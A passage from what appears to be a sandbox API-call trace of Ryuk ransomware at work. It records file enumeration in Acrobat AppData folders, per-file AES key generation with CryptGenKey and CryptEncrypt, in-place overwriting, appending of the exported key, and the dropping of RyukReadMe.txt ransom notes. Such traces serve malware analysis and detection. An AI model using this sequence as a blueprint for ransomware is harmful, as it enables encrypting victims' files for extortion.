lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0140.917] GetLastError () returned 0x0 [0140.917] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0140.918] CloseHandle (hObject=0x194) returned 1 [0140.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0140.919] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0140.919] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0140.919] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.919] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", dwFileAttributes=0x80) returned 1 [0140.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0140.919] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=35116) returned 1 [0140.920] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=35116) returned 1 [0140.920] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x880a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.920] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0140.921] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.921] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0140.921] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0140.921] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.921] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x892c, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x892c, lpOverlapped=0x0) returned 1 [0140.922] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0140.922] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x892c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x8930) returned 1 [0140.923] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.923] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8930, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x8930, lpOverlapped=0x0) returned 1 [0140.923] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0140.923] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0140.923] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0140.923] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0140.923] CloseHandle (hObject=0x198) returned 1 [0140.950] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.955] CryptDestroyKey (hKey=0x3b8690) returned 1 [0140.955] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.955] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0140.955] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.956] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", dwFileAttributes=0x80) returned 1 [0140.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0140.957] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=138459) returned 1 [0140.957] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=138459) returned 1 [0140.957] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x21bb9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.957] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0140.959] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.959] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0140.959] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0140.959] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.959] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x21cdb, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x21cdb, lpOverlapped=0x0) returned 1 [0140.962] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0140.962] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x21cdb, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x21ce0) returned 1 [0140.964] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.964] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x21ce0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x21ce0, lpOverlapped=0x0) returned 1 [0140.964] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0140.964] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0140.964] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0140.964] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0140.965] CloseHandle (hObject=0x198) returned 1 [0140.981] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.985] CryptDestroyKey (hKey=0x3b8690) returned 1 [0140.985] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.985] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0140.985] SetLastError (dwErrCode=0x0) [0140.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0140.986] GetLastError () returned 0x0 [0140.986] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0140.987] CloseHandle (hObject=0x198) returned 1 [0140.987] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0140.987] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0140.987] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0140.987] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.988] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst", dwFileAttributes=0x80) returned 1 [0140.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0140.988] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=53188) returned 1 [0140.988] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=53188) returned 1 [0140.988] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xcea2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.988] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0140.989] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.989] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0140.989] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0140.989] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.990] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xcfc4, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0xcfc4, lpOverlapped=0x0) returned 1 [0140.991] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0140.991] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0xcfc4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0xcfd0) returned 1 [0140.991] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.991] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcfd0, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0xcfd0, lpOverlapped=0x0) returned 1 [0140.991] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0140.991] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0140.991] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0140.992] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0140.992] CloseHandle (hObject=0x19c) returned 1 [0141.008] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.012] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.012] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.012] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.012] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.012] SetLastError (dwErrCode=0x0) [0141.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.012] GetLastError () returned 0x0 [0141.012] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.013] CloseHandle (hObject=0x198) returned 1 [0141.013] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.013] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.014] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents", dwFileAttributes=0x80) returned 1 [0141.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.015] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=5120) returned 1 [0141.015] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=5120) returned 1 [0141.015] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x12de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.015] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0141.016] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.016] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0141.016] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.016] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.016] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1400, lpOverlapped=0x0) returned 1 [0141.017] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0141.017] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1400, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1410) returned 1 [0141.017] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.017] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1410, lpOverlapped=0x0) returned 1 [0141.017] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0141.017] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.017] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.017] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0141.017] CloseHandle (hObject=0x198) returned 1 [0141.034] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.038] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.038] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.038] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.038] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.038] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", dwFileAttributes=0x80) returned 1 [0141.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.039] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=77477) returned 1 [0141.039] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=77477) returned 1 [0141.040] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x12d83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.040] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0141.042] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.042] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0141.042] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.042] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.042] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12ea5, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x12ea5, lpOverlapped=0x0) returned 1 [0141.044] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0141.044] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x12ea5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x12eb0) returned 1 [0141.044] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.044] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12eb0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x12eb0, lpOverlapped=0x0) returned 1 [0141.044] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0141.044] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.044] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.044] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0141.045] CloseHandle (hObject=0x198) returned 1 [0141.060] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.064] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.064] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.064] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.064] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.064] SetLastError (dwErrCode=0x0) [0141.064] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 